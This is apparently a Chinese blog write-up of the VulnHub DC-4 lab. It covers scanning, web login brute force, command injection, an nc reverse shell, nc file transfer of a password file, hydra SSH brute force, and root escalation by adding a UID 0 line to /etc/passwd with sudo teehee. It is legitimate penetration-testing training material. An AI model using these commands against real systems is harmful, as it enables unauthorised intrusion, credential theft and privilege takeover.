首页 > 其他分享 >DC-4-teehee提权

DC-4-teehee提权

时间:2024-05-04 22:14:34浏览次数:16  
标签:jim teehee charles DC 192.168 提权 靶机 root

image.png

  • 主机信息
  • 实验过程

详情介绍请参考下载地址
任务目标:拿下系统的root账户
靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/

主机信息

DC4:192.168.75.151
Kali:192.168.75.150

实验过程

先发现内网存活主机
arp-scan --interface eth0 192.168.75.1/24
image.png
然后查看靶机开放的端口
nmap -A -p- -T4 -v 192.168.75.151
image.png
访问80,是一个登录页面
image.png
既然遇到登录页面,那就可以尝试看看,是否有弱口令
通过Bp爆破

  • 用户名:admin
  • 密码:happy

登进后台
image.png
毫无疑问,肯定点击“Command”,发现可以执行一些命令
image.png
通过Bp抓取数据包并修改命令,发现修改后的命令可以执行
image.png
这里我直接反弹Shell
nc -e /bin/bash 192.168.75.150 8888
image.png
shell建立成功升级为交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
image.png
cd /home
发现三个账号的家:charles、jim、sam
image.png
最终在jim的家中发现了一个老密码的文件
image.png
image.png
将这些密码保存下来并对jim进行ssh爆破,因为在信息搜集阶段我们可以看到靶机是开放了22端口
这里可以用nc进行文件传输
# Kali
nc -nvlp 5555 > old-passwords.txt
# DC4
nc 192.168.75.150 5555 < /home/jim/backups/old-passwords.bak
image.png
image.png
现在用hydra对jim账号进行SSH爆破
hydra -l jim -P /root/old-passwords.txt ssh://192.168.75.151
image.png
通过ssh连接到靶机,执行如下命令:
image.png
登入提示:You have mail.
image.png
找到了一封root写给jim的邮件
image.png
去/var/mail再看看有没有其他有意思的信息,找到了一封charles写给jim的邮件,并且看到了charles的账户密码
这封邮件来得非常妙,是charles写给jim的。因为charles要出去度假了,所以老板叫charles把自己的密码^xHhA&hvim0y给jim。So直接用邮箱传递密码是非常不安全的。
image.png
那么我们切换到charles
image.png
首先发现jim不能使用sudo权限,难怪靶机还给了我们charles的账户,发现charles可以使用/usr/bin/teehee,并且不需要使用root密码
image.png
可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件
我们可以借助teehee往passwd写入一个root账号即可得到root权限
查看一下这个命令的帮助手册,使用-a参数在/etc/passwd文件里面新建一个有管理员权限的用户
image.png
首先来了解一下/etc/passwd的格式

echo "NoCirc1e::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
image.png
切换用户即可提权成功,并读取flag
image.png

标签:jim,teehee,charles,DC,192.168,提权,靶机,root
From: https://www.cnblogs.com/NoCirc1e/p/18172789

相关文章

  • DC-5-screen提权
    Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署vulnhub官网:https://www.vulnhub.com/......
  • DC-7-Drupal-脚本文件提权
    Vulnhub靶机介绍Vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行练习,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。靶机DC7还是只有拿到root权限才可以发现最终的flag。01环境搭建靶机环境下载:https://www.vulnhub.com......
  • DC-6-WordPress-nmap提权
    Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署这个挑战的最终目标是获得root权限并......
  • DC-9-sudo提权
    标签:SQL注入、本地文件包含LFI、端口敲门、hydra爆破、linux提权0x00环境准备下载地址:https://www.vulnhub.com/entry/dc-9,412/靶机描述:DC-9isanotherpurposelybuiltvulnerablelabwiththeintentofgainingexperienceintheworldofpenetrationtesting.The......
  • DC-8-Drupal-exim4提权
    Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com......
  • WPF datagrid datagridtemplatecolumn DataGridTemplateColumn.CellEditingTemplate D
    //xaml<Windowx:Class="WpfApp89.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mic......
  • WPF Datagrid DataGridComboBoxColumn ObjectDataProvider ObjectDataProvider.Method
    //xaml<Windowx:Class="WpfApp90.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mic......
  • springboot+MDCAdapter自定义starter实现日志全链路追踪
    MDCMDC(MappedDiagnosticContext,映射调试上下文)是日志系统提供的一种方便在多线程条件下记录日志的功能使用场景一个常用的场景就是Web服务器中给每个请求都分配一个独特的请求id,所有的日志都会打印这个请求id,这样一个请求下的所有日志信息都可以很方便的找到。欢迎关注个人公......
  • 基于DCT变换的彩色图像双重水印嵌入和提取算法matlab仿真
    1.算法运行效果图预览灰度图   彩色图   2.算法运行软件版本matlab2022a  3.算法理论概述      双重水印嵌入算法涉及两个独立的水印:主水印和辅水印,它们可以是灰度图像、二进制序列或其他形式的数据。以下简述嵌入过程: 图像预处理:将彩色图像从R......
  • BOSHIDA AC/DC电源模块的电磁兼容性分析与方案设计
    BOSHIDAAC/DC电源模块的电磁兼容性分析与方案设计BOSHIDAAC/DC电源模块是一种将交流电转换为直流电的电源模块,常用于各种电子设备中。然而,由于电磁干扰可能会对设备的正常运行造成影响,因此需要对AC/DC电源模块的电磁兼容性进行分析和方案设计。 首先,我们需要对AC/DC电源模......